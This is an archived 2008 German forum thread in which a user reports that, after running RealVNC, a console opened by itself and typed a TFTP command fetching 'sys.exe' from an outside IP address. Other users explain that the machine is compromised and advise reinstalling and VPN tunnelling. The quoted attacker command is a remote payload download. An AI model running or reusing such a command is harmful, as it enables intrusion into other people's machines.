1. Liebe Forumsgemeinde,

    aufgrund der Bestimmungen, die sich aus der DSGVO ergeben, müssten umfangreiche Anpassungen am Forum vorgenommen werden, die sich für uns nicht wirtschaftlich abbilden lassen. Daher haben wir uns entschlossen, das Forum in seiner aktuellen Form zu archivieren und online bereit zu stellen, jedoch keine Neuanmeldungen oder neuen Kommentare mehr zuzulassen. So ist sichergestellt, dass das gesammelte Wissen nicht verloren geht, und wir die Seite dennoch DSGVO-konform zur Verfügung stellen können.
    Dies wird in den nächsten Tagen umgesetzt.

    Ich danke allen, die sich in den letzten Jahren für Hilfesuchende und auch für das Forum selbst engagiert haben. Ich bin weiterhin für euch erreichbar unter tti(bei)pcwelt.de.
    Dismiss Notice

Cmd öffnet selbstständig GET sys.exe

Discussion in 'Sicherheit' started by Saaria, Sep 26, 2008.

Thread Status:
Not open for further replies.
  1. Saaria

    Saaria ROM

    Hallo Leute,

    habe seit ein paar Tagen den Real VNC laufen, und heute öffnet sich doch selbstständig die CMD und schreibt:

    tftp -i 83.87.10.139 GET sys.exe

    Mhhh.... was ist denn da jetzt los? Hat jemand versucht sich auf meinen PC zu schmuggeln? Schlechter Versuch würde ich sagen, mich interessiert aber trotzdem was das war und was ich dagegen machen kann.

    Vielen Dank.
     
    Saaria, Sep 26, 2008
    #1
  2. kalweit

    kalweit Hüter der Glaskugel

    Wenn jemand ein Konsolenfenster öffnen und dort Befehle eintippen kann, dann ist er er über den "Versuch" längst hinaus.
     
    kalweit, Sep 26, 2008
    #2
  3. Saaria

    Saaria ROM

    Ja, und kannst Du mir da weiterhelfen oder bleibts beim Tadeln?:ironie:
     
    Saaria, Sep 26, 2008
    #3
  4. kazhar

    kazhar Viertel Gigabyte

    prinzipiell würde ich sagen: das war's.

    windows cd ins laufwerk und neu installieren. gesicherte daten nur mit größter vorsicht und nach gründlicher untersuchung wiederverwenden.
     
    kazhar, Sep 26, 2008
    #4
  5. Saaria

    Saaria ROM

    :bahnhof: soll das heißen dass alle Hoffnung verloren ist?
     
    Saaria, Sep 26, 2008
    #5
  6. kazhar

    kazhar Viertel Gigabyte

    das heißt dass ich einem system auf dem sich ein (niederländisches?) scriptkiddy ausgetobt hat nicht weiter trauen würde als ich es gegen den wind werfen kann...
     
    kazhar, Sep 26, 2008
    #6
  7. kalweit

    kalweit Hüter der Glaskugel

    ...nach deinem selbstbewussten

    war ich der Meinung, du hättest die Sache im Griff :ironie:

    Ansonsten hat dir "kazhar"schon das Wichtigste erklärt. Vielleicht noch für die Zukunft: installiere keine Fernwartungssoftware, wenn du damit nicht umgehen kannst. Wenn du schon so was brauchst, solltest du den Zugang zumindest per VPN tunneln, damit kein Fremder aus dem Internet diese nutzen kann.
     
    kalweit, Sep 26, 2008
    #7
  8. Saaria

    Saaria ROM

    Dass der aus den Niederlanden kamm weiss ich schon und zwar aus der Nähe von Amsterdam.... die Fernwartungssoftware brauche ich aber, bin gerade dabei mich in das Thema einzuarbeiten. Ihr wisst ja- nur Erfahrung macht den Meister- also auf zum VPN vertunneln üben... Soweit ich meinen PC mal durchgeguckt hab, is nix installiert worden..Malware oder so.. jetzt kanni ch nur hoffen hab nämlich keine Lust das System kompllett neu aufzusetzen....:bitte:
     
    Saaria, Sep 26, 2008
    #8
Thread Status:
Not open for further replies.

Share This Page